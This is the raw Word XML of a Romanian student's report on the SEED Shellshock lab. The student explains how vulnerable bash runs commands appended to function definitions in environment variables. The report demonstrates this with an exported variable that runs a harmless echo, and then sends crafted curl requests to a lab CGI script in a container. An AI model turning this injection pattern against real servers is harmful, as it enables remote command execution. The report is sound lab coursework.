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Raport pentru lucrarea 7: Atacul Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Clauidu-Andrei, gr 30643</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t xml:space="preserve">Sarcina 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Experimente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t xml:space="preserve"> cu funcțiile Bash </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">În prima faza mi-am creat environmentul de lucru prin construirea și pornitrea container-ului </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>victim-10.9.0.80</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>27940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="25730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573020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">nt et/hosts se va adauga intreare </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>www.seedlab-shelshock.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> pentru adresa 10.9.0.80 pentru simularea intrarii în DNS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>157480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5715000" cy="22313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231390"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">am accesat programul CGI folosing progrmul curl din lina de comanda; astfel s-a rulat scriptul shell pe care l-a adaugat pentru afisarea unui mesaj de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>forma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hello World</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-non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9271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927100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>izualizare versiune bash vulnerabila în directorul /bin de pe container</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-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95950" cy="11525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695950" cy="115252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1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>vulnerbilitatea pe care o prezinta un bash (vulnerabil) este ca p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rocesul părinte poate transmite o definiție de funcție </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>altui</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> proces copil </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">folosind o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>variabil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">de mediu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>=&gt; datorita unei erori in procesul de parsare a functiei, bash poate sa execute o comanda/o parte din variabila de mediu cum ar fi un bash script; in cazul nostru, eu voi afisa un mesaj =&gt; “Te-am atacat” folosind un bash vulnerbaul de pe container</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>CAZ BASH VULNERABIL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">atac=' () { echo "Hei bash child"; }; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C9211E"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>echo "Te-am atacat";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>'  - declaram într-o variabila definitia unei funcții urmata de un cod de atac la nivelul bash-ului parinte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>export atac</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>bash_shellshock  -- se va rula bash-ul vulnerbail, iar la pasărea definitiei variabile atac, se va executa mai întâi codul de atac (cel subliniat)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>106045</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5715635" cy="18796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635" cy="1879600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>CAZ BASH NEVULNERABIL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>executam aceeași pași și observam ca nu vom avea functia atac în procesul copil deschis cu un bash nevulnerabil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-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3868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943600" cy="138684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t xml:space="preserve"> </w:t>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Heading2"/>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO"/>
        </w:rPr>
        <w:t>Sarcina 2: Trimiterea de date spre Bash printr-o variabilă de mediu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Sarcina 2.A. Folosirea browserului</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Se vor trimite dste spre bash într-un program GGI bazat pe bash, prin variabile de mediu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">se folosește programul </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>getenv.cgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> de pe serverul containerizat pentru indentificarea datelor de la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>utilizator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> ce pot ajunge în variabilele de mediu ale programului</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>în</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> acest program exista o comanda care în momentul în care este executata se vor tipari variabile (continutulu lor) de mediu din procesul curent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>am instalat extensia Http Header Live și am introdus în bara de search următorul link prin care se va executa scriptul din getenv.cgi din container -&gt; se vor afisa toate variabilele procesului curent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>124460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5715000" cy="40868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15000" cy="4086860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>193040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="9042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943600" cy="904240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>m urmărit de asemenea și în wireshark cererea spre server</w:t>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43624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436245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Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Sarcina 2.B. Utilizarea </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Aceasta comanda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> se poate folosi pentru setarea variabilelor de meiu la valori arbitrare deaorece prin aceasta comanda putem controla majoriatea campurilor dintr-o solicitare http</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">verificare opțiuni pentru metoda </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>v → va tipari antetul cererii http</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">curl -v </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>va tipari si antetul cererii http la accesul spre server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="11">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-86360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>56515</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="45402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5943600" cy="454025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2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">A -&gt;   va permite specificarea unui șir de caractere pentru a fi trimis ca șir User-Agent (un șir de caractere care identifică browserul sau alt client care face cererea către serverul web) în antetul cererii </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -A "BirlutiuAgent" -v </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
          </w:rPr>
          <w:t>http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>se va seta user agent la BitlutiuAgent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="2160" w:hanging="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-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00600" cy="11696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800600" cy="1169670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
        </w:rPr>
